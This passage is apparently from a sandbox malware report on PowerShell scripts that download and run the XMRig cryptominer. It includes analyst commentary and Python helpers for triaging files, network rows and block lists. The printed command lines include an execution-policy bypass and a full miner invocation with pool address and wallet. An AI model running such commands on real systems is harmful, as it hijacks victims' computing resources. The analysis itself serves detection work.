memory/1640-141-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-143-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-145-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-147-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-149-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-151-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-153-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-155-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-157-0x00007FF6579D0000-0x00007FF658603000-memory.dmp
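Two things in the Files list are easy to misread. The __PSScriptPolicyTest_*.ps1 file is written by PowerShell itself at start-up to probe whether AppLocker/WDAC script enforcement applies; it is a host artifact, not something the sample dropped, and the four digests reported for the first one above are exactly the digests of the single byte "1". The memory/ entries repeat the same address range many times because the region is dumped again each time it changes, so the count of distinct ranges per PID is the useful number. The code below is an added example written for this report, not sandbox code; REPORT_FILES copies the three hashed entries from this report (the second probe file is the one from behavioral23 further down) and REPORT_MEMORY is a subset of the memory entries above. The probe-file name pattern is an assumption that fits every instance on this page.

```python
"""Sort the 'Files' entries of this report into host artifacts, dropped files and
per-process memory regions. Added example, not part of the report. REPORT_FILES and
REPORT_MEMORY are copied from the Files lists of the report (memory entries: a subset).
"""
import hashlib
import re
from collections import defaultdict

# PowerShell writes __PSScriptPolicyTest_<random>.ps1 to %TEMP% on start-up to probe whether
# AppLocker/WDAC script enforcement applies. Name layout below is an assumption matching this page.
POLICY_PROBE_RE = re.compile(r"^__PSScriptPolicyTest_[a-z0-9]{8}\.[a-z0-9]{3}\.ps1$", re.I)
MEM_RE = re.compile(r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9a-f]+)-0x(?P<end>[0-9a-f]+)-memory\.dmp$", re.I)
ALGOS = ("md5", "sha1", "sha256", "sha512")

REPORT_FILES = [
    {"path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wyn4ouob.nrd.ps1",
     "md5": "c4ca4238a0b923820dcc509a6f75849b",
     "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
     "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b",
     "sha512": "4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_knopigrb.3c2.ps1",   # behavioral23
     "md5": "d17fe0a3f47be24a6453e9ef58c94641",
     "sha1": "6ab83620379fc69f80c0242105ddffd7d98d5d9d",
     "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7",
     "sha512": "5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "md5": "205ad9eb6acd6f58752899669b69fe74",
     "sha1": "bedb78ac5034259b86c2cbc915de2e861e8d7604",
     "sha256": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda",
     "sha512": "28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3"},
]
REPORT_MEMORY = [
    "memory/2668-3-0x00007FF9338A3000-0x00007FF9338A4000-memory.dmp",
    "memory/2668-5-0x0000024C9FD80000-0x0000024C9FDA2000-memory.dmp",
    "memory/2668-8-0x00007FF9338A0000-0x00007FF93428C000-memory.dmp",
    "memory/2668-10-0x00007FF9338A0000-0x00007FF93428C000-memory.dmp",
    "memory/2668-9-0x0000024CA00A0000-0x0000024CA0116000-memory.dmp",
    "memory/1640-91-0x000001D048060000-0x000001D048080000-memory.dmp",
    "memory/1640-93-0x00007FF6579D0000-0x00007FF658603000-memory.dmp",
    "memory/1640-96-0x00007FF6579D0000-0x00007FF658603000-memory.dmp",
]


def digests(data: bytes) -> dict:
    return {a: hashlib.new(a, data).hexdigest() for a in ALGOS}


def classify_file(entry: dict) -> dict:
    name = entry["path"].rsplit("\\", 1)[-1]
    if POLICY_PROBE_RE.match(name):
        # Compare the reported digests with those of the byte "1"; the probe file is tiny.
        one = digests(b"1")
        return {"name": name, "verdict": "powershell_policy_probe",
                "content_is_literal_1": all(entry[a] == one[a] for a in ALGOS)}
    return {"name": name, "verdict": "dropped_file", "sha256": entry["sha256"]}


def blocklist_sha256(entries) -> list:
    """SHA256 values worth blocking: dropped files only, never the PowerShell probe."""
    return sorted(c["sha256"] for c in map(classify_file, entries) if c["verdict"] == "dropped_file")


def memory_regions(entries) -> dict:
    """Distinct (start, end) ranges per PID; a range dumped repeatedly counts once."""
    regions = defaultdict(set)
    for e in entries:
        m = MEM_RE.match(e)
        if m:
            regions[int(m["pid"])].add((int(m["start"], 16), int(m["end"], 16)))
    return {pid: sorted(r) for pid, r in regions.items()}


def largest_region(regions) -> tuple:
    """(start, end, size) of the biggest range, normally the main image mapping."""
    start, end = max(regions, key=lambda r: r[1] - r[0])
    return start, end, end - start
```

For PID 1640 (xmrig.exe in behavioral7) the largest range is 0x00007FF6579D0000 to 0x00007FF658603000, 0xC33000 bytes, which is the mapped image and the region the XMRig memory signature fires on.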

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:39

Platform

win7-20240508-en

Max time kernel

1558s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Network

N/A

Files

memory/2848-4-0x000007FEF616E000-0x000007FEF616F000-memory.dmp

memory/2848-5-0x000000001B580000-0x000000001B862000-memory.dmp

memory/2848-7-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2848-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

memory/2848-8-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2848-9-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2848-10-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2848-11-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2848-12-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:46

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(63 identical rows, all fields N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp
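Most rows in this table are reverse (PTR) lookups of the form a.b.c.d.in-addr.arpa, which the sandbox issues for every IP it sees; reversing the octets gives back the IP, and an IP that has a PTR row but no connection row is traffic the table does not otherwise show. The helper below is an added example written for this report, not sandbox code. It separates forward lookups, PTR lookups and connections, then labels the connections using the pool host taken from the command line; REPORT_ROWS is the behavioral23 table above verbatim, and GITHUB_HOSTS is an assumed allowlist used only to label the release-download hosts.

```python
"""Triage a sandbox network table. Added example, not part of the report.
REPORT_ROWS is copied from the behavioral23 table; GITHUB_HOSTS is an assumption."""
import ipaddress
from collections import namedtuple

Row = namedtuple("Row", "country dest domain proto")
GITHUB_HOSTS = {"github.com", "objects.githubusercontent.com"}   # assumed download hosts

REPORT_ROWS = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp
"""


def parse_rows(text: str) -> list:
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            rows.append(Row(*parts))
        elif len(parts) == 3:                 # rows with no domain column
            rows.append(Row(parts[0], parts[1], "", parts[2]))
    return rows


def ptr_to_ip(name: str):
    """'195.34.35.161.in-addr.arpa' -> '161.35.34.195'; None for non-PTR names."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None


def triage(rows, pool_hosts) -> dict:
    """Split DNS noise from connections and label each connection by its domain."""
    forward, ptr_ips, conns = set(), set(), {}
    for r in rows:
        ip, _, port = r.dest.rpartition(":")
        if r.proto == "udp" and port == "53":
            ip_from_ptr = ptr_to_ip(r.domain)
            if ip_from_ptr:
                ptr_ips.add(ip_from_ptr)
            else:
                forward.add(r.domain)
        else:
            conns.setdefault(ip, set()).add((int(port), r.domain))
    pool, downloads, other = [], [], []
    for ip, endpoints in conns.items():
        for port, domain in sorted(endpoints):
            entry = (domain, ip, port)
            (pool if domain in pool_hosts else downloads if domain in GITHUB_HOSTS else other).append(entry)
    return {
        "forward_lookups": sorted(forward),
        "pool": sorted(pool),
        "downloads": sorted(downloads),
        "other": sorted(other),
        # PTR-only IPs: the sandbox resolved them, but no connection row exists. Check them
        # before treating them as sample traffic.
        "ptr_only": sorted(ptr_ips - set(conns), key=ipaddress.IPv4Address),
        # What to block: the pool name and the pool ip:port, not the GitHub download hosts.
        "block": sorted({f"{ip}:{port}" for _, ip, port in pool} | {d for d, _, _ in pool}),
    }


if __name__ == "__main__":
    for k, v in triage(parse_rows(REPORT_ROWS), {"rx.unmineable.com"}).items():
        print(k, v)
```

Blocking rx.unmineable.com and 161.35.34.195:443 stops this configuration; blocking github.com would not, and would break legitimate traffic. Note that the pool port is 443 over TLS, so a port-based rule is useless here and the detection has to be on the destination name or IP, or on the process that opens the socket.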

Files

memory/4872-0-0x00007FFADBFD3000-0x00007FFADBFD5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_knopigrb.3c2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4872-10-0x0000022330E90000-0x0000022330EB2000-memory.dmp

memory/4872-11-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp

memory/4872-12-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp

memory/4872-14-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp

memory/4872-15-0x0000022349B10000-0x0000022349B22000-memory.dmp

memory/4872-16-0x0000022330EE0000-0x0000022330EEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/936-47-0x000001F79EBC0000-0x000001F79EBE0000-memory.dmp

memory/936-49-0x000001F831160000-0x000001F831180000-memory.dmp

memory/4872-48-0x0000022349470000-0x000002234968C000-memory.dmp

memory/936-51-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/4872-52-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp

memory/936-56-0x000001F8317D0000-0x000001F8317F0000-memory.dmp

memory/936-55-0x000001F8317B0000-0x000001F8317D0000-memory.dmp

memory/936-53-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/4872-54-0x00007FFADBFD3000-0x00007FFADBFD5000-memory.dmp

memory/4872-58-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp

memory/936-57-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-59-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-60-0x000001F8317B0000-0x000001F8317D0000-memory.dmp

memory/936-61-0x000001F8317D0000-0x000001F8317F0000-memory.dmp

memory/936-62-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-63-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-64-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-65-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-66-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-67-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-68-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-69-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-70-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-71-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-72-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-73-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-74-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-75-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-76-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-77-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-78-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-79-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-80-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-81-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-82-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-83-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-84-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-85-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-86-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-87-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-88-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-89-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-90-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-91-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-92-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-93-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-94-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-95-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-96-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-97-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-98-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-99-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-100-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-101-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-102-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-103-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-104-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-105-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-106-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-107-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-108-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-109-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-110-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-111-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-112-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-113-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-114-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-115-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-116-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-117-0x00007FF649000000-0x00007FF649C33000-memory.dmp

memory/936-118-0x00007FF649000000-0x00007FF649C33000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(64 identical rows, all fields N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.99:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 99.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

memory/1800-0-0x00007FFCFA423000-0x00007FFCFA425000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4v1nrpw5.axg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1800-6-0x00000135AC2D0000-0x00000135AC2F2000-memory.dmp

memory/1800-11-0x00007FFCFA420000-0x00007FFCFAEE1000-memory.dmp

memory/1800-12-0x00007FFCFA420000-0x00007FFCFAEE1000-memory.dmp

memory/1800-14-0x00007FFCFA420000-0x00007FFCFAEE1000-memory.dmp

memory/1800-15-0x00000135AC7B0000-0x00000135AC7C2000-memory.dmp

memory/1800-16-0x00000135AC2C0000-0x00000135AC2CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4136-47-0x00000266EAB90000-0x00000266EABB0000-memory.dmp

memory/4136-48-0x00000266EABE0000-0x00000266EAC00000-memory.dmp

memory/4136-49-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-50-0x00000266EAC00000-0x00000266EAC20000-memory.dmp

memory/4136-51-0x00000266EAC20000-0x00000266EAC40000-memory.dmp

memory/4136-52-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/1800-54-0x00007FFCFA420000-0x00007FFCFAEE1000-memory.dmp

memory/1800-53-0x00007FFCFA423000-0x00007FFCFA425000-memory.dmp

memory/1800-55-0x00007FFCFA420000-0x00007FFCFAEE1000-memory.dmp

memory/4136-56-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-57-0x00000266EAC00000-0x00000266EAC20000-memory.dmp

memory/4136-59-0x00000266EAC20000-0x00000266EAC40000-memory.dmp

memory/4136-58-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-60-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-61-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-62-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-63-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-64-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-65-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-66-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-67-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-68-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-69-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-70-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-71-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-72-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-73-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-74-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-75-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-76-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-77-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-78-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-79-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-80-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-81-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-82-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-83-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-84-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-85-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-86-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-87-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-88-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-89-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-90-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-91-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-92-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-93-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-94-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-95-0x00007FF604650000-0x00007FF605283000-memory.dmp

